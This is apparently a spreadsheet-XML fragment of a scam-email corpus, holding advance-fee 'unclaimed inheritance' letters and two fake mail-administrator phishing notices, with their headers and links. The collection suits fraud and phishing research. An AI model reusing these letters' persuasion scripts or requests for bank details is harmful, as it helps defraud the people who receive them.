    <t>Attention:\n\nDear Sir/Madam,\nCONTACT : mailto:jawilliams@o2.pl\n\nPlease permit me to introduce my humble self to you,\nI'm Mr.JAMES WILLIAMS, I am the Manager of\nInternational Relation with Barclays Bank of Ghana\nLimited, I 'm 48yrs old, I got your email address on\nThe Internet and my confidence reposed on you.\n\nHope you read this Message carefully and reply me\nimmediately.\n\nAlthough we have not met before, but I\nsuggest that this transaction will bring us together.\n\nMy dear, we have a customer, a foreigner but base here\nin Ghana, his Name is Mr. kwme kuffo.\n\nHe is from Atlanta Georgia, but base here with his wife and his\ntwo children, Mr.kwme kuffo has being banking with our\nbank for the past 2yrs, some time MARCH 2004,\nMr.kwme kuffowas on his way to his house, and\nunfortunately, Mr.kwme kuffo ran into a Trailer load of\nGroundnut Oil, and died immediately, their car got\nburnt, No single soul was saved, Mr. kwme kuffo\nand his entire family was confirmed died.\n\nMy Board Directors and Board Management of Barclays Bank of Ghana\nhas mandated and instructed me to look for\nMr.kwme kuffo relation/relatives and his next of Kin\nto come and claim Mr. kwme kuffo Fund, Since MARCH\n2004 till date, I have been looking for Mr. kwme kuffo\nrelation's and relatives/Next of Kin to come and claim\nMr. kwme kuffo Fund which he Deposited with our bank,\nI have contacted his Embassy and after 3days, his\nAmbassador told me that Mr. kwme kuffo has no relation\nand no next of kin, their Ambassador told me that\nMr.kwme kuffo used his first son as his next of kin, but it\nis quite unfortunate that Mr. kwme kuffo died with all\nhis family members.\n\nThe reason why I contacted you is\nthus, Mr. kwme kuffo is dead, and his only son whom\nsupposed to inherit his properties and money also,\ndied with him.\n\nAs at this moment, nobody or Person[s]\nis coming to claim this money from our bank.\n\nThe board directors and management of our bank has told me\nthat if nobody or person[s] apply for the claim of Mr.\nkwme kuffo Fund, the bank will return Mr. kwme kuffo\nFund into our Federal Reserve.\n\nIn the Light of the above, I want you to stand as the\nRelation/relative of\nLate Mr. kwme kuffo; I want you to act as the kwme kuffo\nBrother, so that you will inherit Mr. kwme kuffon Money\nwhich he deposited with our bank, it might interest\nyou to know that Mr. kwme kuffo has a Domiciliary Bank\nAccount with our Bank and he has a total sum of\nUS$9.2M Nine Million Two Hundred Dollars, this is the\nexact amount which late Mr. kwme kuffo has in his\ndomiciliary Account, and this money is still in his\naccount as unclaimed money.\n\nThis transaction is very easy and simple, and it is\n100% risk free, I'm the\nManager for International Relations with Barclays Bank of Ghana Limited, and \nthe Management and Board\nDirectors of the Bank are waiting for me to provide to\nthem the Relation or next of Kin to late Mr. kwme kuffo,\nof which I told them that I am still searching the\nnext of kin to the deceased.\n\nFinally, if you are interested with this transaction, I will front you to \nthe bank as the only next of kin to late Mr. kwme kuffo,\nand I will let the bank know that you are the only\nright person to inherit late Mr. kwme kuffon Funds and\nproperties.\n\nIf you agree with me, I will present you\nto my bank as the rightful person/next of kin to Late\nMr. kwme kuffo, and all Mr. kwme kuffo Properties and his\nMoney US$9.2M Nine Million Two Hundred Thousand\nDollars will be Transferred into your own Account as\nMr. kwme kuffo next of kin.\n\nIf you are interested, just email me. If you are\ninterested, late Mr. kwme kuffo Funds will be credited\ninto your Account.\n\nSo reply me immediately and let me know what you say.\n\nFeel free to ask any questions.\n\nWe will share Late Mr. kwme kuffo Funds 50-50; you will\ntake 50% of the US$9.2M. Which is US$4.600, 000.00\nFour Million Six Hundred Thousand Dollars, while the\nBalance of the same amount will be mine.\n\nI will be waiting for your immediate response,\n\nThanks and have a nice day.\n\nWith immense regards,\n\nJAMES WILLIAMS\n\nCONTACT : mailto:jawilliams@o2.pl\n\n_________________________________________________________________\nShare your special moments by uploading 500 photos per month to Windows Live \nSpaces  \n[URL]http://clk.atdmt.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://clk.atdmt.com</t>
  </si>
  <si>
    <t>2589</t>
  </si>
  <si>
    <t>To: nan\nFrom: Atik Bassim &lt;atik_37@hotmail.fr&gt;\nDate: Thu, 12 Oct 2006 07:36:12 +0000</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2006 07:36:12 +0000</t>
  </si>
  <si>
    <t>Atik Bassim &lt;atik_37@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.Atik BASSIM</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.Atik BASSIMBILL AND EXCHANGE FOREIGN REMITTANCE DEPT. BANK  OF  AFRICA  ( BOA) OUAGADOUGOU, BURKINA FASO ,                        Dear Friend,    Compliments,    I am the manager of bill and exchange at the foreign remittance department of BANK OF AFRICA. I am writting to seek your coperation over this business deal.  In my department,  I discovered an abandoned sum of$15million USD(Fifteen million US dollars)only , in an account that belongs to one of our foreign customers who died along with his entire family in a plane crash that took place in Kenya,East Africa,the Late DR. GEORGE BRUMLEY,a citizen of Atlanta,United States of America but naturalised in Burkinafaso,WestAfrica and  contractor with ECOWAS,(ECONOMIC COMMUNITY OF WEST AFRICAN STATES) .    Since we got information about his death, we have been expecting his next of kin to come over and claim his money because it cannot be released  unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines but unfortunately , all his supposed next of kin or relation died alongside with him at the plane crash leaving nobody behind for the claim. It is therefore upon this discovery that I now decided to makethis businness proposal to you and release the money to  you via your foreign bank account as the next of kin or relation to the deceased for safety and subsequent disbursement since nobody is coming for it and this money Could  go into the Bank treasury as unclaimed Bill.    The Banking law and guideline here stipulates that if such money remainedunclamed after four years, the money will betransfered into the Bank treasury as unclaimed fund.The request for your assistance and maximum co-operation as a  foreign citizen  to stand as the next of kin in this business is occasioned by the fact that the deceased customer was a foreigner and a Burkinabe cannot stand as next of kin to a foreigner. 30 % of this money will be for you as my foreign partner, inrespect to the provision of a foreign account. 10 %will be set aside for expences incured during the business and 60 % would be for me.There after I will come over to your country for disbursement accoding to the percentages indicated.    Therefore to enable the immediate trnansfer of this fund to you as arranged,you must apply first to the bank as the relation or next of kin to the deceased,indicating your claims and wherein the money will be remitted .  Upon receipt of your reply, I will send to you by fax or email the text of application which you will fill and submit to the office of the foreign remittance director of the bank of africa. I will not fail to bring to your notice that this transaction is stricly confidential and i will use my position in this Bank to effect a hitch free transfer of the fund.  You should contact me immediately as soon as you receive this letter.  Trusting to hear from you immediately.  Please , visit the website below for more informations about the Plane Crash and the tragic death of the deceased and his entire family, Late DR.GEORGE BRUMLEY.    [URL]http://www.wral.com[/URL]    Yours faithfully,  MR.Atik BASSIM.Marre des virus ? utilisez Windows Live One Care, c'est gratuit  !</t>
  </si>
  <si>
    <t>http://www.wral.com</t>
  </si>
  <si>
    <t>2588</t>
  </si>
  <si>
    <t>To: nan\nFrom: Atik Bassim &lt;atik_05@hotmail.fr&gt;\nDate: Thu, 12 Oct 2006 07:07:42 +0000</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2006 07:07:42 +0000</t>
  </si>
  <si>
    <t>Atik Bassim &lt;atik_05@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.Atik BASSIMBILL AND EXCHANGE FOREIGN REMITTANCE DEPT. BANK  OF  AFRICA  ( BOA) OUAGADOUGOU, BURKINA FASO ,                        Dear Friend,    Compliments,    I am the manager of bill and exchange at the foreign remittance department of BANK OF AFRICA. I am writting to seek your coperation over this business deal.  In my department,  I discovered an abandoned sum of$15million USD(Fifteen million US dollars)only , in an account that belongs to one of our foreign customers who died along with his entire family in a plane crash that took place in Kenya,East Africa,the Late DR. GEORGE BRUMLEY,a citizen of Atlanta,United States of America but naturalised in Burkinafaso,WestAfrica and  contractor with ECOWAS,(ECONOMIC COMMUNITY OF WEST AFRICAN STATES) .    Since we got information about his death, we have been expecting his next of kin to come over and claim his money because it cannot be released  unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines but unfortunately , all his supposed next of kin or relation died alongside with him at the plane crash leaving nobody behind for the claim. It is therefore upon this discovery that I now decided to makethis businness proposal to you and release the money to  you via your foreign bank account as the next of kin or relation to the deceased for safety and subsequent disbursement since nobody is coming for it and this money Could  go into the Bank treasury as unclaimed Bill.    The Banking law and guideline here stipulates that if such money remainedunclamed after four years, the money will betransfered into the Bank treasury as unclaimed fund.The request for your assistance and maximum co-operation as a  foreign citizen  to stand as the next of kin in this business is occasioned by the fact that the deceased customer was a foreigner and a Burkinabe cannot stand as next of kin to a foreigner. 30 % of this money will be for you as my foreign partner, inrespect to the provision of a foreign account. 10 %will be set aside for expences incured during the business and 60 % would be for me.There after I will come over to your country for disbursement accoding to the percentages indicated.    Therefore to enable the immediate trnansfer of this fund to you as arranged,you must apply first to the bank as the relation or next of kin to the deceased,indicating your claims and wherein the money will be remitted .  Upon receipt of your reply, I will send to you by fax or email the text of application which you will fill and submit to the office of the foreign remittance director of the bank of africa. I will not fail to bring to your notice that this transaction is stricly confidential and i will use my position in this Bank to effect a hitch free transfer of the fund.  You should contact me immediately as soon as you receive this letter.  Trusting to hear from you immediately.  Please , visit the website below for more informations about the Plane Crash and the tragic death of the deceased and his entire family, Late DR.GEORGE BRUMLEY.    [URL]http://www.wral.com[/URL]    Yours faithfully,  MR.Atik BASSIM.Windows Live Messenger sur i-mode : dialoguez sur votre mobile comme sur votre PC avec Bouygues TELECOM !</t>
  </si>
  <si>
    <t>238</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Mail Domain Manager " &lt;admin@mailmanager.com&gt;\nDate: Thu, 12 May 2016 16:53:13 +0200</t>
  </si>
  <si>
    <t>Thu, 12 May 2016 16:53:13 +0200</t>
  </si>
  <si>
    <t>"Mail Domain Manager " &lt;admin@mailmanager.com&gt;</t>
  </si>
  <si>
    <t>1 NEW UPDATE: [jose@monkey.org! Has been blacklisted]</t>
  </si>
  <si>
    <t>Hello jose@monkey.org  , This is to notify you that your e-mail address (jose@monkey.org) has been blacklisted.  For this reason, messages sent to your contacts will be marked as Spam and might be blocked.  To remove your email (jose@monkey.org) from blacklist, please click the link below      To learn more about the blacklist electrnic e-mail security alert system, please click on this link  [URL]https://help.tune.com[/URL]         © Copyright 2016            Hello jose@monkey.org   , This is to notify you that your e-mail address (jose@monkey.org) has been blacklisted. For this reason, messages sent to your contacts will be marked as Spam and might be blocked. To remove your email (jose@monkey.org) from blacklist, please click the link below To learn more about the blacklist electrnic e-mail security alert system, please click on this link [URL]https://help.tune.com[/URL]        © Copyright 2016</t>
  </si>
  <si>
    <t>https://help.tune.com https://help.tune.com</t>
  </si>
  <si>
    <t>1301</t>
  </si>
  <si>
    <t>To: yurilagutin@terra.com.mx\nFrom: yurilagutin@terra.com.mx\nDate: Thu, 12 May 2005 02:39:28 -0800</t>
  </si>
  <si>
    <t>Thu, 12 May 2005 02:39:28 -0800</t>
  </si>
  <si>
    <t>yurilagutin@terra.com.mx</t>
  </si>
  <si>
    <t>YOU ONLY'''</t>
  </si>
  <si>
    <t>Dear one,\n   I am YURIY LAGUTIN and I represent Mr. Mikhail Khordokovsky the\nformer\nC.E.O  of Yukos Oil Company in Russia. I have a very sensitive and\nconfidential  brief from this top (oligarch) to ask for your\npartnership in\nre-profiling  funds over US$97.4 million. I will give the details, but\nin\nsummary, the\nfunds are coming via Bank Menatep. This is a legitimate transaction.\nYou\nwill be paid 4% for your "management fees".\n  If you are interested, please write back by email\nyurlagutin@christzone.com OR stn417ykb@yahoo.com\n\nand  provide me with your confidential telephone number, fax number and\nemail  address and I will provide further details and instructions.\nPlease\nkeep  this confidential; we cant afford more political problems.\nFinally,\nplease\nnote that this must be concluded within two weeks. Please write back\npromptly.I will also suggest you visit these news sites on the internet\nto\nbe better informed about this project.\n[URL]http://www.winne.com[/URL]\n[URL]http://newsfromrussia.com[/URL]\n[URL]http://www.supportmbk.com[/URL]\n[URL]http://www.disinfopedia.org[/URL]\n[URL]http://www.pbs.org[/URL]\n\n[URL]http://www.forbes.com[/URL]\n04&amp;passListType=rson&amp;uniqueId=IF&amp;datatype=rson\n[URL]http://mikhail_khodorkovsky_society.blogspot.com[/URL]\nWrite me back. I look forward to it.\nRegards\nMr. YURIY LAGUTIN\n\n\n</t>
  </si>
  <si>
    <t>http://www.winne.com http://newsfromrussia.com http://www.supportmbk.com http://www.disinfopedia.org http://www.pbs.org http://www.forbes.com http://mikhail_khodorkovsky_society.blogspot.com</t>
  </si>
  <si>
    <t>225</t>
  </si>
  <si>
    <t>To: hammzaidiris@yahoo.co.uk\nFrom: nan\nDate: Thu, 12 Jun 2003 21:54:48 -0400</t>
  </si>
  <si>
    <t>Thu, 12 Jun 2003 21:54:48 -0400</t>
  </si>
  <si>
    <t>hammzaidiris@yahoo.co.uk</t>
  </si>
  <si>
    <t>Urgent response!</t>
  </si>
  <si>
    <t>Union Bank of Nigeria. UBN. Plc.\n           UBN. House Apapa.\n           Lagos-Nigeria\nE-mail: hammzaidiris @yahoo.co.uk\n\nAttn: President/CEO\n\nREQUEST FOR YOUR COOPERATION\n\n      I am hamza idiris, the head of accounts department in the \nUnion Bank of Nigeria (UBN Plc), Lagos. I came to know of you during my\nprivate search on the net for a reputable and a capable hand, that can assist\nin this transaction involving no risk but your trust and confidentiality.\n     There was this Engineer, Engr. Kelvin Michael, an oil merchant/contractor\n with the Federal Govt. of Nigeria, who died in a fatal motor accident three\n years ago.This man before his death was having a closing balance of $8.5m(eight million five hundred thousand dollars.)with our bank, UBN Plc.\nAnd our effort to get in touch with Mr Kelvin's family or his next of kin proved \nabortive. Now we have gotten a new Managing Director who is not aware \nof this money, and we the few management staff that are aware of the \ndevelopment doesn't want him to know, to avoid this money been declared\n"Unclaimed" and subsequently be donated to a Charitable Organization.\n    To avoid this negative development, my colleagues and I have decided to seek\nyour cooperation to have you stand as the next of kin to Late Engr. Kelvin Michael\nso that the said fund (US$8.5m) would be released and paid into your account\noverseas as the next of kin. All documents and proof that will enable you claim\nthis fund without stress will be forwarded to you. Moreso, I want to inform you \nthat we have unanimously agreed to offer you 20% of the sum for the assistance\nand role you are going to play in this transaction, 5% have also been arranged \nto take care of any eventual expenses.\n    If this proposal interest you, and assure us that you will not take undue \nadvantage of the trust we hope to bestow on you, please kindly reach me\nthrough my e-mail address. \nExpecting a positive response from you, thanks and bye for now.\n\nRegards,\n\nHAMMZA IDIRIS.\n\n\n\n\n\n\n\n\n\n______________________________________________________\nGet Paid... With Your Free Email at\n[URL]http://www.zwallet.com[/URL]\n\n</t>
  </si>
  <si>
    <t>43</t>
  </si>
  <si>
    <t>To: ga_mm1@zwallet.com\nFrom: nan\nDate: Thu, 12 Dec 2002 08:40:42 -0500</t>
  </si>
  <si>
    <t>Thu, 12 Dec 2002 08:40:42 -0500</t>
  </si>
  <si>
    <t>ga_mm1@zwallet.com</t>
  </si>
  <si>
    <t>please contact me</t>
  </si>
  <si>
    <t>CORDINATOR, DEBT RECOVERY AND RECONCILIATION \nUNIT OFFICE OF THE ASSISTANT TO THE AUDITOR GENERAL\nAMALGAMATED BANKS OF SOUTH AFRICA (ABSA)\n14TH FLOOR EMBASSY BUILDING CNR SMITH ALIWAL STREET,\nP.O. BOX 1596\nALBERTON BRANCH DURBAN 4000 SOUTH AFRICA.\nEMAIL ga_m@epatra.com \n\n\ndear,\n\nI humbly wish to seek your assistance in a matter that is very important and needs utmost trust and confidence. I am MR Gabriel Mukanabe THE ASSISTANT TO THE AUDITOR GENERAL AMALGAMATED BANKS OF SOUTH AFRICA (ABSA) and a close confidant of one of the South-African most powerful family. The wife of former top Government official, a Gold magnet {OriginalOwner of GRUGGER GOLD CO.}, i.e. late Dr BAMUNGA SANGO MBEKI, former Junior Minister of Mines and Power , Republic ofSouth-Africa.Unfortunately, he died of heart attack soon after handing over because the new Government wanted to probe his activitieswhile in office for financial misappropriations. Presently, all their foreign and local count was frozen and their assets confiscated. The wife, who is now on her sick bed helplessly since her husbands death with her only son to look after, wishes to move out of South-Africa the sum of USD$75 million . She wishes to invest the a for mentioned sum on real estate property/viable inves!\ntments overseas. For obvious reasons, my client does not want to place this fund with established financial institution with the family name forsecurity reasons. It is her desire that the deal be handled as quietly as possible without possibility of any leakage to the public or Government. She has therefore empowered me to find and negotiate for a reliable and trustworthy foreigner who can assist us by using his/her name in moving the money to a foreign safe account and who can assist to invest the fund properly for the family. If you agree to act as a fund manager for my client and the family, I shall release the sum of $75 USD[seventy five million united states dollars] to you if you meet my requirements.The money is available safe with a private security company coded and lodged in with a fictitious name. Upon a favorable response from you, I shall let you know the steps involve. Your commission shall be down payment of 25% of the total sum, and annual 10% of the after ta!\nx returns on investment for the first 5 years. Thereafter, the terms shall be re-negotiated. If you are capable and willing to participate in this \ntransaction contact me through ga_m@epatra.com \nIF FOR ANY REASON YOU ARE NOT DISPOSED AT MOMENT TO \nUNDERTAKE THIS DEAL,LET ME KNOW ON TIME SO AS TO MAKE ALTERNATIVE\nARRANGEMENT.BECAUSE I WILL NOT CONACT ANOTHER PERSON UNTILL I HEAR FROM YOU.\nYours faithfully,\n\nMR Gabriel Mukanabe\n\n\n______________________________________________________\nGet Paid... With Your Free Email at\n[URL]http://www.zwallet.com[/URL]\n\n</t>
  </si>
  <si>
    <t>568</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Email Administrator" &lt;test1@merchminer.com&gt;\nDate: Thu, 11 May 2017 07:21:00 +0100</t>
  </si>
  <si>
    <t>Thu, 11 May 2017 07:21:00 +0100</t>
  </si>
  <si>
    <t>"Email Administrator" &lt;test1@merchminer.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">You have (6) Unread Messages </t>
  </si>
  <si>
    <t>**Move these message into your inbox if found in junk/spam to enable you update your account **                                                                 Server Message!  Dear jose@monkey.org ,  Some of your incoming mails have been bounced back, this is due to failure of updating your account.    If your incoming mail continues to get bounced back  we will regard it as a major server spam and therefore your e-mail account would be suspended.  In order not to have your email account terminated, you are required to upgrade your e-mail account by clicking the secured link below:      Secured Link      Regards. Email Administrator    powered by: Google+         	  This email has been checked for viruses by Avast antivirus software.  --- This email has been checked for viruses by Avast antivirus software. [URL]https://www.avast.com[/URL]  **Move these message into your inbox if found in junk/spam to enable you update your account **  Server Message! Dear jose@monkey.org , Some of your incoming mails have been bounced back, this is due to failure of updating your account.   If your incoming mail continues to get bounced back we will regard it as a major server spam and therefore your e-mail account would be suspended.  In order not to have your email account terminated, you are required to upgrade your e-mail account by clicking the secured link below: Secured Link    Regards.Email Administrator powered by: Google+   This email has been checked for viruses by Avast antivirus software.  Virus-free. [URL]www.avast.com[/URL]</t>
  </si>
  <si>
    <t>453</t>
  </si>
  <si>
    <t>To: R@M\nFrom: MRS. MARIAM ABACHA (WIDOW). &lt;bonakama232322de45@eudoramail.com&gt;\nDate: Thu, 11 May 2000 22:49:53 +0200</t>
  </si>
  <si>
    <t>Thu, 11 May 2000 22:49:53 +0200</t>
  </si>
  <si>
    <t>MRS. MARIAM ABACHA (WIDOW). &lt;bonakama232322de45@eudoramail.com&gt;</t>
  </si>
  <si>
    <t>MRS. MARIAM ABACHA (WIDOW).   FOR ASSISTANCE PLZ.</t>
  </si>
  <si>
    <t>IT IS WITH HEART FULL OF HOPE THAT I WRITE TO SEEK YOUR HELP IN THE CONTEXT BELOW.I AM MRS, MARIAM ABACHA (WIDOW) THE WIFE OF FORMER HEAD OF STATE OF NIGERIA, GENERAL SANI ABACHA WHO'S SUDDEN DEATH OCCURRED ON THE 8TH OF JUNE, 1998. AS A RESULT OF CARDIAC ARREST WHILE STILL IN GOVERNMENT. \n\nI GOT YOUR EMAIL CONTACT FROM ONE OF THE MY FAMILY FRIEND A DIRECTOR, WITH THE NIGERIA CHEMBERS OF COMMERCE AND INDUSTRY. \n\nI HAVE NO DOUBT ABOUT YOUR CAPACITY AND GOOD WILL TO ASSIST ME IN RECEIVING INTO YOUR PERSONAL BANK ACCOUNT (FOR SAFETY)THE SUM OF US$ 32,800,000.00 (THIRTY TWO MILLION, EIGTH HUNDREDTHOUSAND US DOLLAS)"WILLED" AND DEPOSITED IN MY LATE HUSBAND'S FAVOUR THIS MONEY IS CURRENTLY DEPOSITED WITH A SECURITYCOMP ANY IN TWO TRUNK BOXES AS BELONGINGS AWAITING COLLECTION. \n\nAS IT IS LEGALLY REQUIRED, THE ADMINISTRATION OF MY LATE HUSBAND'S PROPERTIES IS UNDER THE AUTHORITY OF THE FAMILY'S LAWYER NAMED (BARRISTER BENSON &amp;ASSOCIATES). SINCE THE DEMISE OF MY HUSBAND, THE PRESENT REGIME(GOVERNMENT) HAS BEEN PROBING MY LATE HUSBAND'S WEALTH. \n\nPRESENTLY, SOMECASH ASSETS WITHIN AND OUTSIDE NIGERIA HAVE BEEN FROZEN AND SEIZED.FORTUNATELY, OUR FAMILY LAWYER HAD SECRETLY PROTECTED THE PERSONAL WILL OF MY LATE HUSBAND FROM THE NOTICE OF THE GOVERNMENT MEANWHILE, I AND EVERY MEMBER OF MY FAMILY ARE BEING MONITORED AND ALSO DENIAD ACCESS TOFINANCIAL DEALING WITHIN AND OUTSIDE NIGERIA. \n\nHENCE, I WAS ADVICE BY MYPERSONAL ASSISTANCE TO EMPLOYE THE ASSISTANCE OF A NEUTRAL INDIVIDUALOUTSIDE NIGERIA AND WITH THE LEGAL BACKING OF MY FAMILY LAWYER TO POSE ASTHE BENEFICIARY OF THE WILLED MONEY AND THEREFORE CLAIM THE CONSIGNMENT FROM THE SECURITY COMPANY FOR BENEFIT OF US ALL. \n\nTHE GOVERNMENT HAD EARLIER PLACED FOREIGN EMBARGO ONALL OUR FAMILY MEMBERS, SEIZED ALL KNOWN LOCAL AND INTERNATIONAL OUTFITS OF OUR BUSINESS EMPIRE. THE SITUATION HAS BEEN SO TERRIBLE THAT WE ARE VIRTUALLY LIVING ON THE ASSISTANCE OF OUR WELL WISHERS. IN VIEW OF THIS PLIGHT THEREFORE, I EXPECT YOU TO BE TRUST WORTHY AND KIND ENOUGH TO RESPOND TO MY MAIL TO SAVE MY FAMILY AND I FROM A HOPELESS FUTURE. \n\nI HEREBY AGREE TO CONPENSATE YOUR SINCERE AND CANDID EFFORT IN THIS REGARD WITH 20% OF THE FUND WHEN FINALLY RECEIVED INYOUR PERSONAL BANK ACCOUNT. \n\nMY LAWYER WILL MAKE EVERY ARRENGMENTS TO EFFECT COMPLETE DISLODGMENT OF THIS MONEY WITHIN A WEEK OF THE RECEIPT OF YOUR RESPONSE THROUGH E-MAIL.PLEASE, ALL CONTACT ON PHONE MUST BE THROUGH OUR FAMILY LAWYER- BENSON &amp; ASSOCIATES OR MY PERSONAL ASSISTANCE WHILE YOU COMMUNICATE WITH ME ON EMAIL AS I AND MY FAMILY MEMBER IS BEEN HEAVELY MONITORED BY THE GOVERNMENT.\n\nI WILL ALSO FORWARD THE EMAIL AND PHONE NUMBER OF BARRISTER BENSON &amp; ASSOCIATES OR THAT OF MY ASSISTANCE TO YOU AS SOON AS I RECIEVE YOUR RESPONSE.\n\nI LOOK FORWARD TO YOUR QUICK RESPONSE.\n\n\nMAY ALLAH BLESS YOU.PLEASE REPLY ME THROUGH MY PRIVATE EMAIL ADDRESS:mariamabacha4real@444.net   \n\nBEST WISHES, \n\nMRS. MARIAM ABACHA (WIDOW).\n\n\n NB: PLEASE I WILL WANT YOU TO GO THROUGH THE FOLLOWINGWEBSITE IN OTHER TO CONFIRM MORE ON THE ISSUES OF THE ABACHA ANDTHEFEDERAL GOVERNMENT SEIZURE AND FROZON ON THE ABACHA'S WEALTH. \n\n[URL]http://news.bbc.co.uk[/URL] ([URL]http://www.econdad.org[/URL] \n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.econdad.org</t>
  </si>
  <si>
    <t>2854</t>
  </si>
  <si>
    <t>To: nan\nFrom: Ajken udea &lt;ajken_x3@hotmail.com&gt;\nDate: Thu, 11 Jan 2007 22:22:22 +0000</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2007 22:22:22 +0000</t>
  </si>
  <si>
    <t>Ajken udea &lt;ajken_x3@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Happy New Year..</t>
  </si>
  <si>
    <t>Attn: Sir/ Madam,\n\n  I am the personal account officer to the great late INDUSTRIALIST who had \nan account in one of the top banks here in South Africa.\n\n  Forgive my contact because this letter comes to you as a surprise, as you \ndon't know of it's coming before. My contact is for you to please assist to \ntransfer US$125,000.000.00 ( One hundred &amp; twenty- five million United \nStates dollars only) in tranches from a Prime Bank here in South Africa to \nany oversea's account(s). The account was opened in 1998 and he died in 2003 \nwithout a written or oral WILL and since 2003 nobody had operated the \naccount. The account is dormant and the funds floating. If I do not remit \nthis money out urgently it will be forfeited to the bank.\n\n  Firstly, I must solicit your strictest confidence in this transaction \nbecause of my official position and nature of the deal. The business can be \nconcluded in 10 (ten) banking days .I am sure and have confidence of your \nability and reliability to prosecute a transaction of this great magnitude. \nThe account holder was a foreigner and no other person knows about this \naccount or anything concerning it, the account has no other beneficiary and \nuntil his death he was the accountant of the company. My investigation \nthrough the National immigration department proved to me as well that he was \nsingle as at the time of his entry into the Republic of South Africa.\n\n  The credit balance in this account is USD$125 Million ( One Hundred &amp; \nTwenty five Million United States Dollars only). Your assistance as a \nforeigner is necessary because the management of the bank will welcome any \nforeigner who has correct information on this account which I will disclose \nto you if you are interested to do this business with me.There is no risk in \nthis business if you follow my instructions. Given my position and my \npersonal rapport with the manager of the bank, the funds can be transferred \nto any account(s) you nominate .I need an assurance from you that this money \nwill be intact pending my arrival to your bank for disbursements.\n\n  State the A/C Details.\nA/c No:............\nBank Name:........\nA/c Holder:........\nBeneficiary Name:...\n\n  We will start with the first swift wire-transfer of US$25 million( Twenty \n-five million United States only) Upon successful transfer of the first \ntranch without any disappointment from your side, you shall apply for the \noutstanding sum of US $100 Million to the same or other account(s). Armed \nwith correct information as a foreigner and appropriate documentations as we \nshall arrange I will use my position to secure a prompt conclusion to the \ntransaction.\n\n  Your duty is to send me the banking coordinates for the transfer while \nmaintaining the required confidentiality . At the conclusion of the transfer \nyou will receive 35%, 5% will be for any expenses both parties incurred in \nthe process of this business and 60% of the funds will be for me.\n\n  Upon your strong assurance of your full cooperations and receipt of your \naccount details then I will start the process of the funds transfer to your \naccount without further delay. Contact Me immediately for futher details.\n\n  Thanks for your anticipated cooperations.\n  Yours Faithfully,\nMr.Stephen Ajken\n\n_________________________________________________________________\nSee their smiles, hear their laughter with Windows Live Messenger! \n[URL]http://messenger.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2853</t>
  </si>
  <si>
    <t>To: nan\nFrom: MRS CHRISTINA HOLDEN &lt;mrschristin200000@tiscali.de&gt;\nDate: Thu, 11 Jan 2007 19:12:24 +0100</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2007 19:12:24 +0100</t>
  </si>
  <si>
    <t>MRS CHRISTINA HOLDEN &lt;mrschristin200000@tiscali.de&gt;</t>
  </si>
  <si>
    <t>DEAR BELOVED, \n \nI am Mrs. Christina Holden. \n\nAm married to Dr. Donald Holden. a Liberian who worked for Shell Oil \nCompany in Nigeria,he died after a brief illness that lasted for only \nfour days. Before his death we were married for 11 good years without a \nchild and were both born again Christians . Since his death I decided\nnot to re-marry or get a child outside my matrimonial home which the \nBible forbids. \n \nWhen my late husband was alive he deposited the sum of $10.5 Million \n(Ten Million five hundred thousand U.S.Dollars) with A Bank.Presently, \nthis money is still under the safe keeping of the RESERVE FINANCE \nCOMPANY Recently, my Doctor told me that I would notlast for the next \nThree(3) months due to my cancer problems. \n\nThough what disturbs me most now, i recently had stroke.Having known \nmy condition, I decided to donate this fund to church or betterstill a \nChristian or muslim individual That will utilize this money theway I am \ngoing to instruct here in. I want a church that will use this fund on,\norphanages, deaf and dumb and poor widows propagating the word of God \nand to ensure that the house of God is maintained.The Bible made us to \nunderstand that blessed is the hand that giveth.I took this decision \nbecause I don't have any child that will inherit this money and my \nhusband relatives are not Christians and I don't want my husband's hard \nearned money to be misused by unbelievers. I don't want a situation \nwhere this money will be used in an ungodly manner. Hence the reason \nfor taking this bold decision. \n \nAs soon as I receive your reply I will forward your personal \ninformation, such as Your full name, Your full address, with Your \ntelephone and fax number to my lawyer through his email  so that he \nwill contact you as the legal owner of my fund before the bank will be \ntransferring the fund into your nominated Bank Account in your country. \nI will also issue you a letter of a authority that will back you up as \nthe real next of kin and the original- beneficiary of my fund. I want \nyou and the church to always pray for me because the lord is my \nshepherd,you will also promise me that you will not seat on the fund \nwhen it gets into your bank account. My happiness is that I lived a \nlife of a worthy Christian. \n\nWhoever that wants to serve the Lord must serve him in spirit and \ntruth. Please always be\nprayerful all through your life, any delay in your reply will give me \nroom in serching for a church or Christian individual for this same \npurpose. Please assure me that you will act accordingly as I stated \nherein.Hoping to hear from you as soon as possible.\n  \nRemain blessed in the name of the Lord. \n\nYours in Christ, \n\nMrs. Christina Holden. \n\n\n\n\n\n\n\n\nEndlich Sicherheit bei Computerabstuerzen - Phoenix Recover Pro. [URL]http://internetzugang.tiscali.de[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2852</t>
  </si>
  <si>
    <t>To: nan\nFrom: alhji imam &lt;alhji_imamu@hotmail.fr&gt;\nDate: Thu, 11 Jan 2007 09:29:09 +0100</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2007 09:29:09 +0100</t>
  </si>
  <si>
    <t>alhji imam &lt;alhji_imamu@hotmail.fr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">TREAT AS URGENT AND CONFIDENTIAL </t>
  </si>
  <si>
